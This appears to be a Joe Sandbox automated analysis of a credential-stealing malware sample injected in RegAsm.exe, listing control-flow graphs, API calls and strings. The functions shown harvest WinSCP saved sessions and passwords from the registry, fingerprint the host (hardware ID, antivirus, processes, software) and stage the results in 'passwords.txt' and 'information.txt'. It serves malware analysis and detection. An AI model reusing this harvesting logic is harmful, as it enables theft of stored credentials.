                                                                            control_flow_graph 1047 40e7b8-40e888 _EH_prolog memset * 7 RegOpenKeyExA 1048 40eced-40ed07 call 401061 1047->1048 1049 40e88e-40e8b0 RegGetValueA 1047->1049 1051 40e8b2-40e8b5 1049->1051 1052 40e8cc-40e8cf 1049->1052 1051->1048 1054 40e8bb-40e8c7 1051->1054 1052->1051 1055 40e8d1-40e8d4 1052->1055 1054->1048 1056 40e8e2-40e8f7 RegOpenKeyExA 1055->1056 1057 40e8d6-40e8df 1055->1057 1056->1048 1059 40e8fd-40e918 RegEnumKeyExA 1056->1059 1057->1056 1059->1051 1061 40e91a-40e927 call 40f923 1059->1061 1064 40e92b-40e9f8 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e RegGetValueA call 40fa9c call 40f9e1 call 40f98e RegGetValueA 1061->1064 1083 40ea43-40ea64 call 40fa9c call 40f9e1 1064->1083 1084 40e9fa-40ea41 call 41118e call 40fa28 call 40f9e1 call 40f98e 1064->1084 1093 40ea6a-40eb81 call 40f98e call 40fa9c call 40f9e1 call 40f98e RegGetValueA call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e RegGetValueA call 40fa9c call 40f9e1 call 40f98e StrCmpCA 1083->1093 1084->1093 1124 40eb83-40ebaf call 40e2ff 1093->1124 1125 40ebeb-40ec61 call 40fa9c call 40f9e1 call 40f98e RegEnumKeyExA memset * 2 1093->1125 1130 40ebb1 1124->1130 1131 40ebb3-40ebe6 call 40fa9c call 40f9e1 call 40f98e call 40dd10 1124->1131 1125->1064 1139 40ec67-40ecd4 call 40fb4d lstrlenA call 40fb4d call 40f923 call 4010b1 call 414437 call 40f98e memset 1125->1139 1130->1131 1131->1125 1156 40ece2-40ece8 call 40f98e 1139->1156 1157 40ecd6-40ecdf 1139->1157 1156->1048 1157->1156
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040E7BD
                                                                            • memset.MSVCRT ref: 0040E7E6
                                                                            • memset.MSVCRT ref: 0040E806
                                                                            • memset.MSVCRT ref: 0040E81A
                                                                            • memset.MSVCRT ref: 0040E82E
                                                                            • memset.MSVCRT ref: 0040E83D
                                                                            • memset.MSVCRT ref: 0040E84B
                                                                            • memset.MSVCRT ref: 0040E85C
                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040E884
                                                                            • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E8AC
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040E8F3
                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E910
                                                                            • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00425C37), ref: 0040E9A2
                                                                            • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E9F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: memset$Value$Open$EnumH_prolog
                                                                            • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                            • API String ID: 784052110-2798830873
                                                                            • Opcode ID: 22ccd7e304eadcc4645c99c76537ddb57fad35517efbdbe2963d3d3b8e3d35a3
                                                                            • Instruction ID: d618dc23c2e72a82e05694064c6b478e31e9db7f730d5c61c806b48b50ccc5c5
                                                                            • Opcode Fuzzy Hash: 22ccd7e304eadcc4645c99c76537ddb57fad35517efbdbe2963d3d3b8e3d35a3
                                                                            • Instruction Fuzzy Hash: DBF11CB1D0025DAEDB11EBE1CC81FEEBB7CAF18304F5441BAE515B2182DB785A48CB65
                                                                            Function 00414604 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1004stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1432 414604-4153f5 _EH_prolog call 40f923 call 40fa9c call 40f9e1 call 40f98e call 4020ed call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc38 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410415 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4104a2 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4104dd call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e GetCurrentProcessId call 411001 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 41064b call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 41077c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410925 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fbfd call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fbcb call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4103a0 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fce5 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc38 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc92 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fe18 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40feb4 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fe81 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40ff81 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40ffea call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4102c3 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410071 call 40fa28 call 40f9e1 call 40f98e * 2 call 410071 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d call 40f923 call 4010b1 call 414437 call 40f98e * 2 call 401061
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00414609
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FC38: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004264F6), ref: 0040FC46
                                                                              • Part of subcall function 0040FC38: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004264F6), ref: 0040FC4D
                                                                              • Part of subcall function 0040FC38: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004264F6), ref: 0040FC59
                                                                              • Part of subcall function 0040FC38: wsprintfA.USER32 ref: 0040FC84
                                                                              • Part of subcall function 00410415: memset.MSVCRT ref: 0041043B
                                                                              • Part of subcall function 00410415: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004264F6,?,?,00000000), ref: 00410457
                                                                              • Part of subcall function 00410415: RegQueryValueExA.KERNEL32(004264F6,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                              • Part of subcall function 00410415: CharToOemA.USER32(?,?), ref: 00410493
                                                                              • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                              • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                              • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                              • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                              • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004265A8,00000000,?,00000000,00000000,?,HWID: ,00000000,?,0042659C,00000000), ref: 00414922
                                                                              • Part of subcall function 00411001: OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                              • Part of subcall function 00411001: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                              • Part of subcall function 00411001: CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                              • Part of subcall function 0041064B: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                              • Part of subcall function 0041064B: HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                              • Part of subcall function 0041077C: _EH_prolog.MSVCRT ref: 00410781
                                                                              • Part of subcall function 0041077C: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                              • Part of subcall function 0041077C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                              • Part of subcall function 0041077C: CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?), ref: 004107C4
                                                                              • Part of subcall function 0041077C: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                              • Part of subcall function 0041077C: VariantInit.OLEAUT32(?), ref: 00410855
                                                                              • Part of subcall function 00410925: _EH_prolog.MSVCRT ref: 0041092A
                                                                              • Part of subcall function 00410925: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?,00000000), ref: 00410942
                                                                              • Part of subcall function 00410925: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                              • Part of subcall function 00410925: CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?), ref: 0041096D
                                                                              • Part of subcall function 00410925: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                              • Part of subcall function 00410925: VariantInit.OLEAUT32(?), ref: 004109F6
                                                                              • Part of subcall function 0040FBFD: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000), ref: 0040FC09
                                                                              • Part of subcall function 0040FBFD: HeapAlloc.KERNEL32(00000000,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ), ref: 0040FC10
                                                                              • Part of subcall function 0040FBFD: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FC24
                                                                              • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                              • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                              • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                              • Part of subcall function 004103A0: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
                                                                              • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
                                                                              • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
                                                                              • Part of subcall function 004103A0: ReleaseDC.USER32(00000000,00000000), ref: 004103D6
                                                                              • Part of subcall function 004103A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426620,00000000,?), ref: 004103E2
                                                                              • Part of subcall function 004103A0: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426620,00000000,?,00000000), ref: 004103E9
                                                                              • Part of subcall function 004103A0: wsprintfA.USER32 ref: 004103FB
                                                                              • Part of subcall function 0040FCE5: _EH_prolog.MSVCRT ref: 0040FCEA
                                                                              • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,00426257,00000001,?,00000000), ref: 0040FD1C
                                                                              • Part of subcall function 0040FCE5: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                              • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                              • Part of subcall function 0040FCE5: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                              • Part of subcall function 0040FCE5: LocalFree.KERNEL32(?), ref: 0040FE03
                                                                              • Part of subcall function 0040FC92: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                              • Part of subcall function 0040FC92: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                              • Part of subcall function 0040FC92: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                              • Part of subcall function 0040FC92: wsprintfA.USER32 ref: 0040FCD7
                                                                              • Part of subcall function 0040FE18: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C), ref: 0040FE2C
                                                                              • Part of subcall function 0040FE18: HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C,00000000,?), ref: 0040FE33
                                                                              • Part of subcall function 0040FE18: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                              • Part of subcall function 0040FE18: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                              • Part of subcall function 0040FEB4: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FF07
                                                                              • Part of subcall function 0040FEB4: wsprintfA.USER32 ref: 0040FF4D
                                                                              • Part of subcall function 0040FE81: GetSystemInfo.KERNEL32(00000000), ref: 0040FE8E
                                                                              • Part of subcall function 0040FE81: wsprintfA.USER32 ref: 0040FEA3
                                                                              • Part of subcall function 0040FF81: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4), ref: 0040FF8F
                                                                              • Part of subcall function 0040FF81: HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                              • Part of subcall function 0040FF81: GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                              • Part of subcall function 0040FF81: wsprintfA.USER32 ref: 0040FFDC
                                                                              • Part of subcall function 0040FFEA: _EH_prolog.MSVCRT ref: 0040FFEF
                                                                              • Part of subcall function 0040FFEA: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410057
                                                                              • Part of subcall function 004102C3: _EH_prolog.MSVCRT ref: 004102C8
                                                                              • Part of subcall function 004102C3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                              • Part of subcall function 004102C3: Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                              • Part of subcall function 004102C3: Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                              • Part of subcall function 004102C3: CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                              • Part of subcall function 00410071: _EH_prolog.MSVCRT ref: 00410076
                                                                              • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042626F,00000001,00000000), ref: 004100BE
                                                                              • Part of subcall function 00410071: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                              • Part of subcall function 00410071: wsprintfA.USER32 ref: 00410132
                                                                              • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                              • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                              • Part of subcall function 00410071: lstrlenA.KERNEL32(?), ref: 0041018E
                                                                              • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00426298), ref: 0041020E
                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,004266F0,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,004266E0), ref: 0041537A
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                            • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $T$Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                            • API String ID: 722754166-3257470747
                                                                            • Opcode ID: 8e79461fdbb141f0f1334f164d06d81da42756099588a8b0a40a232787f46a23
                                                                            • Instruction ID: 34389346271f1e4f7fe34ee782a08fd334c824368f8c7b7c5cb1de368f42fff1
                                                                            • Opcode Fuzzy Hash: 8e79461fdbb141f0f1334f164d06d81da42756099588a8b0a40a232787f46a23
                                                                            • Instruction Fuzzy Hash: 7C921EB190424DE9CB15E7E1C952BEEBB789F24308F5041BEE505725C2DE782B8CCAB5
                                                                            Function 0040C27B Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 296stringmemoryfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040C280
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425B4C,?,?,?,00425B46,?,00000000), ref: 0040C378
                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C3D9
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0040C3E0
                                                                            • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C470
                                                                            • lstrcat.KERNEL32(00000000), ref: 0040C487
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0040C499
                                                                            • lstrcat.KERNEL32(00000000,00425B50), ref: 0040C4A7
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4B9
                                                                            • lstrcat.KERNEL32(00000000,00425B54), ref: 0040C4C7
                                                                            • lstrcat.KERNEL32(00000000), ref: 0040C4D6
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4E8
                                                                            • lstrcat.KERNEL32(00000000,00425B58), ref: 0040C4F6
                                                                            • lstrcat.KERNEL32(00000000), ref: 0040C505
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0040C517
                                                                            • lstrcat.KERNEL32(00000000,00425B5C), ref: 0040C525
                                                                            • lstrcat.KERNEL32(00000000), ref: 0040C534
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0040C546
                                                                            • lstrcat.KERNEL32(00000000,00425B60), ref: 0040C554
                                                                            • lstrcat.KERNEL32(00000000,00425B64), ref: 0040C562
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040C596
                                                                            • memset.MSVCRT ref: 0040C5E9
                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040C616
                                                                              • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                              • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                              • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                              • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                            • String ID: passwords.txt
                                                                            • API String ID: 3298853120-347816968
